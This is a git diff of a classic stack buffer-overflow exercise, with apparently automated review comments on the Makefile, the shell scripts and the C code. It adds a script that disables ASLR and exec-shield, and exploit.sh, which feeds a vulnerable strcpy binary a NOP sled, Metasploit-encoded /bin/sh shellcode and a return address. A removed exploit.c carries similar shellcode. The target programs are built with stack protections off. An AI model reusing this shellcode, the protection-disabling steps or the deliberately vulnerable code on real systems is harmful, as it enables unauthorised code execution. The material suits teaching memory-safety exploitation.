-rw-r--r-- | Makefile | 29 | ||||
-rwxr-xr-x | disable_prot.sh | 9 | ||||
-rw-r--r-- | exploit.c | 51 | ||||
-rwxr-xr-x | exploit.sh | 8 | ||||
-rw-r--r-- | overflow.c | 27 | ||||
-rw-r--r-- | overflow_function.c | 16 | ||||
-rw-r--r-- | overflow_minimal.c | 11 |
7 files changed, 34 insertions, 117 deletions
@@ -2,30 +2,19 @@ RM := rm
 CC := gcc
 CFLAGS = -Wall -g3
 OCFLAGS = -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector
-BINS = exploit
-OBINS = overflow overflow_minimal overflow_function exploit
+TARGETS = $(patsubst %.c,%.o,$(wildcard *.c))
-all: exploit overflow
+all: $(TARGETS) msg
-exploit:
- @echo 'building exploits'
- for file in $(BINS); do \
- $(CC) $(CFLAGS) exploit.c -o exploit; \
- done
+msg:
+ @echo "now run:"
+ @echo " ./disable_prot.sh"
+ @echo " ./exploit"
-overflow:
- @echo 'building exploitable binaries'
- for file in $(OBINS); do \
- $(CC) $(CFLAGS) $(OCFLAGS) $$file.c -o $$file; \
- done
+%.o : %.c
+ $(CC) $(CFLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@) $<
 clean:
- for file in $(BINS); do \
- $(RM) -f $$file; \
- done
- for file in $(OBINS); do \
- $(RM) -f $$file; \
- done
- @echo ' '
+ $(RM) -f $(patsubst %.o,%,$(TARGETS))
 .PHONY: all clean
diff --git a/disable_prot.sh b/disable_prot.sh
new file mode 100755
index 0000000..16498a3
--- /dev/null
+++ b/disable_prot.sh
@@ -0,0 +1,9 @@
+#!/bin/sh
+
+if [ `id -u` -ne 0 ]; then
+ echo "$0: This program should be run as root"
+fi
+
+sysctl -w kernel.randomize_va_space=0 2>/dev/null
+sysctl -w kernel.exec-shield=0 2>/dev/null
+
diff --git a/exploit.c b/exploit.c
deleted file mode 100644
index 3137c91..0000000
--- a/exploit.c
+++ /dev/null
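Review bot: The `msg` target tells the user to run `./exploit`, but this commit deletes exploit.c and adds exploit.sh, and `$(wildcard *.c)` now expands to overflow.c only, so no `exploit` binary is built any more; the line should read `@echo " ./exploit.sh"`. The `%.o : %.c` rule also writes to `$(patsubst %.o,%,$@)` instead of `$@`, so `overflow.o` never exists, `make` relinks on every run, and `clean` has to repeat the same renaming; making the binary itself the target removes both problems. `msg` is not listed in `.PHONY` and has no dependency on `$(TARGETS)`, so under `make -j` the hint can print before the build has finished. The rewritten lines are below; `all:` and the first two echo lines are unchanged.
```make
TARGETS := $(patsubst %.c,%,$(wildcard *.c))
# … unchanged: all: $(TARGETS) msg …
msg: $(TARGETS)
# … unchanged: the "now run:" and disable_prot.sh echo lines …
	@echo " ./exploit.sh"
%: %.c
	$(CC) $(CFLAGS) $(OCFLAGS) -o $@ $<
clean:
	$(RM) -f $(TARGETS)
.PHONY: all clean msg
```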
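Review bot: The root check on the `if` line only prints a message and falls through, so the two `sysctl -w` lines still run unprivileged and, with their stderr sent to /dev/null, fail without any visible error; add `exit 1` after the echo and drop `2>/dev/null` at least on the randomize_va_space line so a refused write is reported. `kernel.exec-shield` presumably is not present on every kernel, so if the redirection is there to tolerate that, a comment saying so would be clearer than silencing both results. There is also no way back: a comment naming the default, `sysctl -w kernel.randomize_va_space=2`, or a matching restore script would document that the weakened setting is meant to be temporary.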
@@ -1,51 +0,0 @@ -/* - * main.c - * - * Created on: 27.01.2012 - * Author: druid - */ - -#include <unistd.h> -#include <stdio.h> -#include <stdlib.h> -#include <fcntl.h> -#include <sys/stat.h> -#include <string.h> - -#define PATH_CT "./overflow" -#define ENV_VAR "EXPLOIT" -#define NOP 0x90 - - -static char shellcode[]= -"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" -"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; - -u_long -esp() -{ - __asm__("movl %esp, %eax"); -} - -int -main() -{ - - u_char buf[1032]; - u_long addr; - int i; - - strcpy(buf, "/usr/bin/pico; "); - - addr = esp() - 192; - for (i = 16; i < 128 + 16; i += 4) - *((u_long *) (buf + i)) = addr; - for (i = 128 + 16; i < 1040; i++) - buf[i] = 0x90; - for (i = 0; i < strlen(shellcode); i++) - buf[1040 + i] = shellcode[i]; - buf[1040 + i] = '\n'; - - setenv(ENV_VAR, buf, 1); - execl(PATH_CT, "overflow", (char *) 0); -} diff --git a/exploit.sh b/exploit.sh new file mode 100755 index 0000000..a078e4a --- /dev/null +++ b/exploit.sh @@ -0,0 +1,8 @@ +#!/bin/sh + +# shellcode generated with metasploit (exec /bin/sh): +# ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' + +# 117xNOP (0x90) + shellcode + 117xNOP (0x90) + return addr + +./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'` 
@@ -9,39 +9,28 @@
 #include <stdio.h>
 #include <string.h>
-#define ENV_VAR "EXPLOIT"
-#define BUFLEN 10
-
+/* 300 bytes buffer len + 4 bytes for overwrite return opcode */
+#define BUFLEN 300
 void overflow(const char *src, char *dst) { /* exploitable function */ strcpy(dst, src);
+ /* nothing to do, just return */
 }
 int main(int argc, char **argv) {
- char *s, *env;
 char buf[BUFLEN];
- fprintf(stderr, "buflen: %d\nenv_var: %s\nargs: %d\n\n", BUFLEN, ENV_VAR, (argc - 1));
- if (argc > 1)
- {
+ if (argc > 1) {
 overflow(argv[1], buf);
- }
- else if ((env = getenv(ENV_VAR)))
- {
- overflow(env, buf);
- }
- else
- {
- fprintf(stderr, "neither "ENV_VAR" set or arg0 given, abort!\n");
- return(1);
- }
-
- printf("buf: %s\n*buf: %p\nbuflen: %d\n", s, s, strlen(s));
+ } else {
+ fprintf(stderr, "arg1 missing\n");
+ return(1);
+ }
 return (0); }
diff --git a/overflow_function.c b/overflow_function.c
deleted file mode 100644
index 6d6e950..0000000
--- a/overflow_function.c
+++ /dev/null
@@ -1,16 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-
-void stupid(char *str)
-{
- char buf[30];
- /* exploitable function */
- strcpy(buf, str);
-}
-
-int main(int argc, char **argv)
-{
- stupid(argv[1]);
- return 0;
-}
diff --git a/overflow_minimal.c b/overflow_minimal.c
deleted file mode 100644
index 760e33f..0000000
--- a/overflow_minimal.c
+++ /dev/null
@@ -1,11 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-
-int main(int argc, char **argv)
-{
- char buf[30];
- /* exploitable function */
- strcpy(buf, argv[1]);
- return 0;
-}
|
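Review bot: The comment added above the define, `/* 300 bytes buffer len + 4 bytes for overwrite return opcode */`, does not match the value below it: `BUFLEN` is exactly 300, so the extra 4 bytes it mentions are not part of anything in this file and a reader will look for them. Reword it to describe what the constant is, e.g. `/* size of buf in main(); overflow() copies into it with no bound on purpose */`, and keep frame-layout remarks next to the build flags that actually determine the layout. The new `else` branch keeps the old `return(1);` spelling while the function ends with `return (0);` — pick one. This section's file header is outside SOURCE; going by the diffstat it is overflow.c, and the includes before line 9 are not shown.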